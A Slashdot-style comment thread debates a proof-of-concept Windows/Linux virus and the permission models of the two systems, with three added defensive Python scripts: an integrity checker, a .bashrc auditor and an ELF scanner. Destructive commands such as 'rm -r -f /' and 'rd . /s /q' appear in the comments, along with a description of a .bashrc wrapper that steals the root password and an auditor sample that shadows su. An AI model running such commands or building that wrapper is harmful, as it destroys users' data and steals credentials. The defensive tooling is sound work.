    Open source development leads to faster fixes; almost nobody argues this point anymore who is not pushing an agenda. Linux systems are far easier to keep up to date since they are almost entirely open source and free (speech+beer). The result is mechanisms like 'apt-get update; apt-get upgrade' that will update every piece of software on the system, whether OS, 3rd party service, or text editor.

    This and a strong security model (execute capability must be explicitly enabled by a user who knows how to do it and has permission; default create masks do not make files executable; users ACTUALLY can only impact files they are supposed to be able to impact) make the spreading of viruses on Linux a non-issue. Flaws are patched faster than the viruses spread, damage is limited to a single user directory and even then only to the data created since the last backup. Most clueless users are unable to execute the virus file in the first place because they are unable to set permissions.

    grandchild.jpg.exe can never work on linux, period. You have to get the user to open a prompt cd to /home/granny/.email/files then chmod +X grandchild.jpg.exe, THEN ./grandchild.jpg.exe (in linux you have to create a launcher to execute a file in the gui, double-clicking will not work).

    "Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA,"

    lol, if you say so. I challenge you to browse porn sites for a couple hours using IE under a user account. You will be amazed to find that spyware has spread beyond the one profile every time.

  27. Is this another do-it-yourself? by WhiteWolf666 · · Score: 4, Insightful

    How do you get this "virus"? You have to run infected code, right?

    Meh. Sounds like a non-issue to me. Especially considering the rarity of cross-platform Win32/Linux binaries.

    Just how does this badboy get on to my system in the first place?

    People need to understand that any system that permits a user to run unsigned executable code is susceptible to some kind of "malware", if you can call it that. I place these "viruses" in the same category of rm -r -f / wrapped into a shell script.

    --
    WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
    1. Re:Is this another do-it-yourself? by runderwo · · Score: 2, Funny

      As a first step in this direction, I recommend placing the execution stack in ROM. Following that, we can move towards a ROM heap, and maybe ROM-based disk drives.

  28. Re:Not to worry by LightCecil · · Score: 2, Informative

    I do it all the time in windows. this is an XP-only solution, but meta-l-s or logout/switch user leaves your windows untouched to open an admin account. And if that's too much work, there's a 'Run As' box that (on my system) automatically appears when something that requires admin powers to install is run. Not to mention you can also do something like I do, install it in a folder with its ACL set to child inheritance and rwx for your user account, which doesn't even require admin power to install in.

    So it's not as hard as you make it out to be, but requires a little bit more setup.

  29. Re:Not to worry by Reo+Strong · · Score: 3, Informative
    Ever heard about the runas command? It is also known as Secondary Logon.

    Remember, just because you don't know how to use it, it doesn't mean that the tool isn't there for you to use.

    --
    "Never attribute to malice that which can be adequately explained by stupidity." -Anon.
  30. Oh gee, wow! by Liam+Slider · · Score: 3, Funny

    Yet another proof of concept Linux virus that will never actually get out of the lab...oh wait, it's also a Windows virus. I guess it will get out of the lab...

  31. Re:Not to worry by colin_young · · Score: 2, Funny

    I believe the parent is correct. e.g. the chicken is prepared for the oven...

  32. Re:Not to worry by andreyw · · Score: 3, Interesting

    The problem isn't that it isn't there. The problem is that you need to do something to make use of it. On OS X, if there is some task that needs admin access, I get prompted accordingly. With windows, such functionality is only available in certain control panel applets.

  33. RunAs by Changa_MC · · Score: 2, Informative

    If RunAs worked reliably, you'd have a point. Secondary processes started by the installer default back to the standard user, and then fail because they require admin privileges. PITA indeed.

    --
    Changa hates change.
    1. Re:RunAs by E-Rock · · Score: 4, Informative

      No, just think harder.

      Run the Add/Remove Programs control panel applet as your admin account. Then use add new programs to run the installer. The other benefit is that the installer is running as admin, so you can browse to installs out on the network that live in places users can't reach.

  34. Linux Infection Instructions by rossz · · Score: 5, Funny

    To Infect your Linux box with Virus.Linux.Bi.a, please follow these instructions.

    1. If gcc is not installed, install it.
    2. Unpack the archive: tar xvzf Virus.Linux.Bi.a.tar.gz
    3. Switch to the directory: cd Virus.Linux.Bi.a
    4. ./configure
    5. make
    6. su root
    7. make install

    Enjoy

    --
    -- Will program for bandwidth
    1. Re:Linux Infection Instructions by Bob+The+Cowboy · · Score: 2, Funny

      Compile from source??? No thanks, I'll just wait for the .rpm/.deb!

    2. Re:Linux Infection Instructions by Xtifr · · Score: 3, Informative

      That's fine, makes sense to me, but you will still need root access to install it properly.

  35. More Linux advantages...; protecting low value by PhYrE2k2 · · Score: 4, Insightful
    Windows users are prepared for viruses and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.


    There are lots of reasons why it's harder to infect 'NIX systems.

    1. Since on many LiNuX distros, the single source of binaries is usually the distributions' package system, it is usually very easy to detect anything out of the ordinary. The trusted channel is a GOOD thing in these cases.

    2. Add in a tool like AIDE (or Tripwire) and you can immediately see everything that is off with your system.

    3. How about Linux (and most UNIX) not allowing ctime changes to anything but the current time? The ctime (often said as creation time, but wrongly so- it's the CHANGE time) on any update will always be the current time. The _only_ way around this is to change the system time before you modify files.

    4. Priv separation is a big thing. Daemons aren't run as root (or if they do, they drop privs right away). There is no svchost.exe running your services at NT_AUTHORITY or SYSTEM like there is in Windows. Then of course there's no need to run your Web browser as a user with any rights at all. IE7/Vista will fix this of course. Personally I like making, even FireFox, setuid to some untrusted user with no access to files.

    5. Embedding scripting in every tool isn't as popular in the UNIX worlds, as the core tools work so well. There's no need for office software to have scripting capabilities to change all the files on the system. There's no need for it!

    Actually, you're quite wrong. Linux flaws have existed

    So do cars, toasters, appliances, and pretty much every item. Welcome to the age where quality means nothing.

    The reason Linux users don't sweat is because flaws are spotted quickly by many people who read the code, and fixed quickly too. That and people who code open-source tend to produce good code, as a matter of pride.

    They produce good code because they do it for themselves. Most open-source developers are developing for themselves. Every project starts up as "this IMAP server doesn't suit my needs. I'll make a better one". Of course the people who do that are normally the technically able. People make projects for themselves because there's a need that hasn't been met or they're unhappy how it's being met by someone else. Otherwise there's lots of people wasting their time. DJB was unhappy with sendmail/BIND and made alternates. BincIMAP, Courier, and Dovecot folks make them because the others and UW-IMAP didn't do what they want. Patches are submitted to fix something that's affecting them, may affect them, or to add an enhancement they want. Time is money, and people ultimately want to contribute their time for their own benefit somewhere down the road.

    Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA

    Even then, you'd be surprised what you can accomplish to destroy the system. Keep in mind, if you're running a SINGLE USER system as a user in order to add security, you're protecting your LEAST valuable asset. I can blow away a system and install Windows/Office/Adobe and all the tools I need in a few hours and have it configured perfectly. I'm sure most people here can. Now replacing the data would take years! Replacing the productivity lost to viruses/spyware/virii can't be measured. Assessing the impact of leaked administrator and bank passwords could be huge!

    -M
    --
    when you see the word 'Linux', drink!
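    The package-channel, AIDE/Tripwire and ctime points in the list above can be shown in a few lines. The Python script below is an added example, not the page's own code and not AIDE or Tripwire: it records a SHA-256, mtime and ctime baseline for a constructed temporary tree, tampers with one file, and then resets that file's mtime with os.utime (which can set atime and mtime but has no way to set ctime), so both the digest comparison and the ctime check still report the change. File names and contents are constructed for the demo.

```python
import hashlib
import os
import shutil
import tempfile
import time


def file_digest(path):
    """SHA-256 of the file contents, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Record digest, mtime and ctime for every regular file under root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            st = os.lstat(path)
            baseline[os.path.relpath(path, root)] = {
                "sha256": file_digest(path),
                "mtime_ns": st.st_mtime_ns,
                "ctime_ns": st.st_ctime_ns,
            }
    return baseline


def compare(baseline, root):
    """Return (relpath, finding) tuples for every file that differs from the baseline."""
    findings = []
    for rel, old in baseline.items():
        path = os.path.join(root, rel)
        if not os.path.exists(path):
            findings.append((rel, "missing"))
            continue
        st = os.lstat(path)
        if file_digest(path) != old["sha256"]:
            findings.append((rel, "content changed"))
        if st.st_mtime_ns != old["mtime_ns"]:
            findings.append((rel, "mtime changed"))
        if st.st_ctime_ns != old["ctime_ns"]:
            findings.append((rel, "ctime changed"))
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            if rel not in baseline:
                findings.append((rel, "new file"))
    return findings


def demo():
    """Constructed scenario: baseline two files, tamper with one, then try to hide
    the edit by restoring its old mtime. os.utime sets atime/mtime only, so the
    kernel-maintained ctime still moves and the digest still differs."""
    root = tempfile.mkdtemp(prefix="integrity-demo-")
    try:
        for name, body in (("bin_ls", b"original"), ("etc_passwd", b"root:x:0:0")):
            with open(os.path.join(root, name), "wb") as f:
                f.write(body)
        baseline = build_baseline(root)
        time.sleep(0.1)  # let the filesystem clock advance past the baseline
        target = os.path.join(root, "bin_ls")
        with open(target, "wb") as f:
            f.write(b"tampered")
        old = baseline["bin_ls"]
        os.utime(target, ns=(old["mtime_ns"], old["mtime_ns"]))  # mtime "restored"
        return compare(baseline, root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{rel}: {finding}")
```

    The baseline itself is the weak point of any such tool: keep it (and the checker) off the monitored host or on read-only media, as AIDE and Tripwire documentation recommend, or a root-level compromise can simply regenerate it.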
  36. Re:Not to worry by drinkypoo · · Score: 2, Informative

    I just want to say that anybody that thinks running as User (or even Power User, if you must) and using RunAs is a pain in the ass has not even tried it seriously.

    Well, I'm reading your post, and if it doesn't get attention it's not because you're a coward, it's because you're an idiot.

    RunAs DOES NOT WORK. Oh, it works sometimes, but any process spawned from your installer will run as the user, not the RunAs user as which the installer is running. This is because of a conscious design decision in Windows which is different from every other operating system I've ever used. In order to spawn a process as the RunAs user, you must manually look up the user that the process was spawned as, and use an entirely different function call which takes a user (probably a SID) as an argument. This means that when you start an installer with a 16 bit stub, which is still distressingly common even today, the install will run as you, not the user you entered in the RunAs window.

    If YOU had really done a thorough examination, you'd know this already. Shill.

    --
    "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
  37. It's hard to lose your files in home too by dbIII · · Score: 2, Insightful
    Deleting everything in my home directory is anything but minimal
    Here we have the single user versus multi-user idea. On a multiuser system the virus can only delete things that are owned by the same user or group as it is running as. *nix is a multiuser system even if only one person uses it, since various programs run as virtual users such as nobody, lp and various others. Unless you are tricked into running it yourself or it somehow gets root via privilege elevation through major flaws it can't do a lot. It really is like the joke "This is a linux virus. Please type 'rm *' - Thanks".

    The real issue is about the virus code running in the first place. Since linux mail clients don't execute code in attachments because that would be a stupendously stupid thing to have a program do (Outlook not so good) that reduces the chance of a virus dramatically. Since software is available in a different way people don't download bonzi buddy or whatever to linux, so that reduces the chance of malware a huge amount as well. There's still the chance of tricking a user into downloading a binary and running it - but that's reduced by the way package management is done and where people go looking for their binaries, usually in a distro repository.

    The way I understand it, in "the real world" as referred to before, single isolated incidents of people getting tricked into running malware are not what you would call a virus, simply because it is very slow to spread. The different system design as such is what makes the impact minimal. The different design means the problem instead is not a virus, but people getting in via poor security and running rootkits. Someone running bots to find vulnerable machines and then getting into them is not a virus, and that's what we should be worried about more than a simplistic view based on what happens on very different systems.

    How many users do you know who would enter their superuser password to "get free screensavers"?
    On workplace machines it is very bad practice to let any of these people have the root or admin password on their machine unless it is in a development environment that can't talk to the outside world. The difference with the MS Windows environment is that there is a lot of stuff that can go wrong even without the admin password due to so many things running as that user. With home machines you have to take responsibility for your own actions.
  38. Uh-Oh by locohijo · · Score: 2, Funny

    Steve Jobs' lawyer may come knocking at the author's door handing him a subpoena about infringing Universal Binary patents.

    And Mac fanboys may go about arguing that Windows and Linux are mere copy-cats and that they were the first to have Universal Binaries.

  39. Re:The real difference: root vs. non-root by Sigma+7 · · Score: 2, Informative
    The real difference, for now at least, is that most Windows users run applications and more importantly web browsers with administrative privileges.

    Most Linux/*nix users do not.


    A properly written Linux/Unix virus will do the equivalent of rootkitting the ".bashrc". It hides itself in that file - then it redirects input/output through itself, being the man-in-the-middle. You won't notice it unless you log in as root and see that users have a disproportionate amount of space.

    However, from a proper security perspective, you won't log in as root - you'd use a "lesser" account and "su" to root. That's how the virus will infect the system - it grabs the root password while you type it in, and it rootkits the system.

    If you stick with a mindset that viruses can't spread under Linux, then you'll end up with the exact opposite you expect. While we may not be at a tech level that makes this level of hacking practical (because it would generally have to emulate an entire operating system), don't be surprised when these attacks start appearing.
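    A defender's counterpart to the ".bashrc" trick described in the comment above is to check shell start-up files for anything that shadows su or sudo. The Python below is an added example, not code from the post: it flags aliases and shell functions named after privileged commands, and PATH assignments that put a user-writable directory ahead of the system directories. The sample rc text, the list of command names and the notion of which path prefixes count as user-controlled are constructed assumptions, and the findings are review items, not proof of compromise.

```python
import os
import re

# Commands that a wrapper in the user's shell could sit in front of; constructed list.
PRIVILEGED_COMMANDS = {"su", "sudo", "passwd", "ssh", "gpg"}

ALIAS_RE = re.compile(r"^\s*alias\s+([A-Za-z_][\w-]*)=")
FUNC_RE = re.compile(r"^\s*(?:function\s+)?([A-Za-z_][\w-]*)\s*\(\s*\)")
FUNC_KW_RE = re.compile(r"^\s*function\s+([A-Za-z_][\w-]*)\b")
PATH_RE = re.compile(r"^\s*(?:export\s+)?PATH=[\"']?([^\"'#]*)")


def _user_controlled(component):
    """Heuristic: path components the unprivileged user can normally write to."""
    c = component.strip()
    return c in ("", ".") or c.startswith(
        ("$HOME", "${HOME}", "~", "/home/", "/tmp", "./"))


def audit_rc(text):
    """Return (line_no, kind, detail) findings for the text of one rc file."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = ALIAS_RE.match(line)
        if m and m.group(1) in PRIVILEGED_COMMANDS:
            findings.append((n, "alias-shadow", m.group(1)))
            continue
        m = FUNC_RE.match(line) or FUNC_KW_RE.match(line)
        if m and m.group(1) in PRIVILEGED_COMMANDS:
            findings.append((n, "function-shadow", m.group(1)))
            continue
        m = PATH_RE.match(line)
        if m:
            first = m.group(1).split(":")[0]
            if _user_controlled(first):
                # A user-writable directory searched before /usr/bin lets a file
                # named "su" there win over the real binary.
                findings.append((n, "path-prepend", first))
    return findings


def audit_home(home=None):
    """Audit the usual rc files of a home directory (reads real files if present)."""
    home = home or os.path.expanduser("~")
    report = {}
    for name in (".bashrc", ".bash_profile", ".profile", ".bash_aliases", ".zshrc"):
        path = os.path.join(home, name)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as f:
                report[name] = audit_rc(f.read())
    return report


# Constructed sample ~/.bashrc with two shadowed commands and a PATH prepend.
SAMPLE_RC = """\
# constructed sample rc for the demo
export EDITOR=vim
alias ll='ls -l'
alias su='$HOME/.cache/.fonts/su'
sudo() { "$HOME/.local/lib/sudo-helper" "$@"; }
export PATH="$HOME/.local/bin:$PATH"
"""

if __name__ == "__main__":
    for line_no, kind, detail in audit_rc(SAMPLE_RC):
        print(f"line {line_no}: {kind} ({detail})")
```

    The same check belongs in any host-based audit of multi-user machines, and `type su` in a fresh shell is the one-liner equivalent: it prints whether the name resolves to an alias, a function or a file, and which file.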
  40. Dual-boot infector? by Ungrounded+Lightning · · Score: 2, Insightful

    I'm not sure from TFA exactly what concept this thing is "proving".

    But one I've been waiting for is a dual-boot virus or worm.

    When you're running windows, for instance, your unix filesystems are all there to be twiddled with, if the malware knows how. Unix' protection mechanisms would be useless because they're not what's running. So the virus could infect the unix partition and do all sorts of nasties later when you boot Linux. (The virus infection head or payload could include enough filesystem code to twiddle the linux files even if the windows system doesn't know how - all it needs is access to the raw bits, which good 'ol windows will be happy to grant.)

    It could also work the other way, of course, with a linux virus or worm infecting things on the Windows partition. But given the relative vulnerabilities I expect most will work the other way.

    Point is, a dual-boot system is only as secure as the weaker OS.

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
  41. Re:Not to worry by mrsbrisby · · Score: 2, Insightful

    Deleting everything in my home directory is anything but minimal.

    Compared to deleting your entire system?

    Nevertheless, why do you run at a privilege level that can delete everything in your home directory? Is it so you can delete _a_ file that you make it possible to delete _any_ file?

    This isn't necessary; I regularly run applications with split privilege levels. My "main" account and my "run" account are in the same group. If I need to edit a file, my vi-wrapper gives group-write permissions to the file I'm editing and then drops privileges. Once the vi-wrapper exits, group-write permissions are removed.

    The web browser runs as another user- so while I suppose a "virus" could knock out my bookmarks, I actually publish those over the network (so I can share them with my laptop).

    My email client uses rsync to download my email. The client itself runs at a reduced privilege. Worst case scenario is that a malicious virus could delete the flags I put on messages so I might forget which ones I replied to (but only on the most recent ones- because I archive my email into files that have been chattr +i).

    All in all, this system that I use is fairly immune to viruses. I'm sorry yours is not, but at least you have the ability to make it so on a Unixish system.

    You simply don't on a Windows system.

    Spam relays and DDoS botnets don't need root access, just the ability to send data over the network

    No. They need to do something normal programs on my system do not. The only UDP traffic I generate is DNS traffic, so I suppose they could DOS my dnscache- it just happens to be running on the same machine. Using iptables is easy with owner-matching, and it protects against this very thing.

    Meanwhile, my email is sent using serialmail. I'd notice immediately if when I went to send messages, there were an awful lot of them. Other people would too. Why don't you?

    How about modifying your GNOME or KDE menu to point to a fake terminal entry or fake admin tools?

    Regular users rarely install programs, and I never do. I don't give my run account the ability to modify my menus. It simply can't happen.

    Windows lacks "setuid", so it makes my security measures impossible.

    How do you know that the "gnome-terminal-emulator" you're now typing your password into (through sudo) isn't actually stealing it?

    It's called a SAK. And I don't switch to a more privileged user without it.

  42. A Marketing Campaign? by debiansid · · Score: 2, Insightful

    It's important for enterprises to be aware of such issues and implement anti-virus tools for protecting non-Windows operating systems if they haven't done so already, Ullrich said.

    So is that the real intention of the entire article? The original report is at viruslist.com, which is again a Kaspersky owned site. So take a guess...

    Also, at the end of the story on SANS they have put up an update saying that the virus will have to run as r00t to be able to do any real damage. Kinda like most proof of concept virii developed for *nix in the past isn't it?

  43. Re:POC = Piece Of Crap? by urbanriot · · Score: 3, Informative
    Alas, deltree is gone in XP.

    I wish I knew what the new equivalent was. Right now I just use cygwin's rm -rf :\

    rd . /s /q

    Been around since NT.

  44. Re:When one of these is seen in the wild ... by Admiral+Burrito · · Score: 2, Insightful
    You're all missing the point - this proof-of-concept makes NO system calls. There is NO need for "privilege escalation". Once started, it has enough knowledge of the host filesystem to read and write to files itself.

    Bullshit.

    User-mode processes - even those running as root - have no access to the hardware, except RAM (and then only pages mapped into the address space by the kernel) and CPU (and then only for a period of time decided by the kernel). There is no way to write to the host filesystem except through the kernel. This restriction is enforced by the CPU itself. The kernel runs in ring 0, code within the process does not.

  45. Links? by spaceturtle · · Score: 2, Interesting
    Hi could you give the links to the technology you are using. I am very interested in this field (giving applications less rights than the user). I have not heard of SAKs before.

    BTW, Have you heard of Plash or Systrace?

    Unfortunately I don't think that many Linux systems are set up the way you describe, though I intend to make it my personal quest to make sure they are.

    Also, have you come across a way of stopping GUI applications taking over other GUI application via the X protocol?

    I know that it is possible to run X applications in untrusted mode, but I understand that it is still possible for untrusted applications to snoop on other untrusted applications via X, so we cannot simply run all applications in untrusted mode.

  46. Re:Not to worry by shaitand · · Score: 3, Informative

    The marketshare argument has been made before again and again. Until Linux has a 90% desktop share this can not be tested. The best we can do is look to the other popular open source programs that do have a stronger marketshare.

    Apache is an excellent example, Apache is the market leader in a much more financially appealing segment than the desktop. Strangely it is Microsoft's underdog IIS program that suffers from exploits and worms.

    Remember the permissions model under linux does not allow you to simply click a link and execute code... not even local executable code.

  47. Re:Okay, So Here's The Linux "Threat " As I See It by Junta · · Score: 2, Informative

    1) If you are considering the virus' validity all by itself, it doesn't matter what language it is in. If you are considering it as a proof of concept for a new type of virus, the detail of it being written in assembly is a) not as damning as you portray and b) probably not indicative of a requirement going forward.

    2) This is what *really* made me have to reply. You must have *no* idea of what exactly is ELF on a linux box. Every compiled application in the last 10 years or so has been almost exclusively ELF. Without ELF support, you simply don't have a working modern distribution. You could theoretically try to run the old a.out format, but that really isn't any more safe in the long term and highly impractical.

    3) Again, the important aspect is 'proof-of-concept'. This particular virus doesn't bother to attempt chdir, but that does not preclude the concept of more general implementation. But the rest of what you say is applicable. Once I would have said an inexperienced user frequently only bothers to run as root, since it makes things easier, but with the proliferation of strategies like Ubuntu, things are handled a lot more sanely. The lesson they learned is not to ask a typical user for a root password at *all*, lest they be tempted to use it for everything.

    It is conceptually hard to see this thing spreading. The strategy of spawning from ELF applications means it has to be set executable by something prior to being run. In Windows they historically accomplish the analogous function by leveraging the weak strategy of filename based executable status and the 'friendly' feature of hiding extensions that only sometimes work, and you have 'nicepicture.jpg.pif' or something similar that a Windows app lazily hands the file over and then Windows makes the lazy choice of honoring .exe. Now there are a lot of precautions to prevent this in an up to date Windows system, but architecturally this is how it happens. In linux, the permissions dictate and the permissions are not transferred with the file content (unless encapsulated by something like tar). gnome-open a potentially executable file without the executable permission and nothing interesting should happen.

    Again, as non-root usage for even the lazy users increases, this strategy with respect to propagation becomes irrelevant as few users run applications capable of relaying the content that they would also have write access to. Now if by some miracle infected by a virus of this type with goals other than spreading, it can be almost as functionally devastating, despite the privilege separation. For the same reasons that the system files and other users are protected from a particular users activity, most of a single-user machine's important data is owned by the user. Sure, if attacked they could make a new user unaffected without reinstall as worst case, but they may have lost all their documents, records, and images they actually care about that aren't recoverable.

    The net of it is that the stuff important to a desktop user is not protected from viruses, but the traditional executable binary approach of viruses just doesn't apply to linux. Exploiting buffer mismanagement and such in media players, document readers, image renderers, etc *are* applicable in linux as well as Windows and this would be the only sort of virus that I would watch to be a remote success. This strategy doesn't try to dance around the strong impediments at the low level architecture, but exploits the much more likely poorly coded app given permission to run legitimately by the low level platform.

    --
    XML is like violence. If it doesn't solve the problem, use more.
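    Comments 26 and 47 both turn on two facts: what an ELF file actually is, and that on Linux the execute bit, not the file name, decides whether a file can be run. The Python below is an added example, not the page's or the virus's code: a small ELF header decoder plus a scan that walks a directory and reports, for each regular file, whether it is ELF and whether any execute bit is set, which is the inventory an administrator would want of a home directory. The 64-byte header it builds follows the ELF header layout (e_ident, e_type, e_machine, ..., e_shstrndx) and contains no code; the directory layout and file names are constructed for the demo.

```python
import os
import shutil
import stat
import struct
import tempfile

ELF_MAGIC = b"\x7fELF"
ELF_TYPES = {0: "NONE", 1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}


def parse_elf_header(data):
    """Decode the ELF identification bytes and the fixed header fields.

    Returns None when `data` does not start with a well-formed ELF header.
    Both 32- and 64-bit images and both byte orders are handled."""
    if len(data) < 24 or data[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = data[4], data[5]  # ELFCLASS32/64, ELFDATA2LSB/MSB
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine, e_version = struct.unpack(endian + "HHI", data[16:24])
    if ei_class == 2:
        if len(data) < 48:
            return None
        e_entry, e_phoff, e_shoff = struct.unpack(endian + "QQQ", data[24:48])
    else:
        if len(data) < 36:
            return None
        e_entry, e_phoff, e_shoff = struct.unpack(endian + "III", data[24:36])
    return {
        "bits": 64 if ei_class == 2 else 32,
        "endian": "little" if ei_data == 1 else "big",
        "type": ELF_TYPES.get(e_type, "UNKNOWN"),
        "machine": e_machine,
        "version": e_version,
        "entry": e_entry,
        "phoff": e_phoff,
        "shoff": e_shoff,
    }


def scan_tree(root):
    """Classify every regular file under root by ELF-ness and execute bit.

    Returns a sorted list of (relative path, kind, executable) where kind is
    "elf" or "other" and executable is True if any x bit is set in the mode."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue
            with open(path, "rb") as f:
                head = f.read(64)
            kind = "elf" if parse_elf_header(head) else "other"
            executable = bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
            results.append((os.path.relpath(path, root), kind, executable))
    return sorted(results)


def sample_elf64_header():
    """Constructed 64-byte little-endian x86-64 ET_EXEC header (header only, no code)."""
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8
    rest = struct.pack("<HHIQQQIHHHHHH",
                       2, 62, 1,            # e_type=EXEC, e_machine=62 (x86-64), e_version
                       0x401000, 64, 0,     # e_entry, e_phoff, e_shoff
                       0, 64, 56, 0, 64, 0, 0)  # e_flags, e_ehsize, e_phentsize, e_phnum,
    return e_ident + rest                    # e_shentsize, e_shnum, e_shstrndx


def demo():
    """Constructed home directory: an executable ELF, a mailed ELF with no
    execute bit (it cannot simply be run) and an executable shell script."""
    root = tempfile.mkdtemp(prefix="elf-scan-")
    try:
        samples = {
            "bin/tool": (sample_elf64_header(), 0o755),
            "Mail/grandchild.jpg.exe": (sample_elf64_header(), 0o644),
            "bin/backup.sh": (b"#!/bin/sh\necho ok\n", 0o755),
        }
        for rel, (body, mode) in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(body)
            os.chmod(path, mode)  # permissions live in the inode, not the content
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, kind, executable in demo():
        print(f"{rel:28} {kind:6} exec={executable}")
```

    Run against a real home directory, `scan_tree(os.path.expanduser("~"))` lists exactly the set of files that comment 47's "set executable by something prior to being run" refers to; an ELF that arrives by mail lands in the non-executable column unless something explicitly changes its mode.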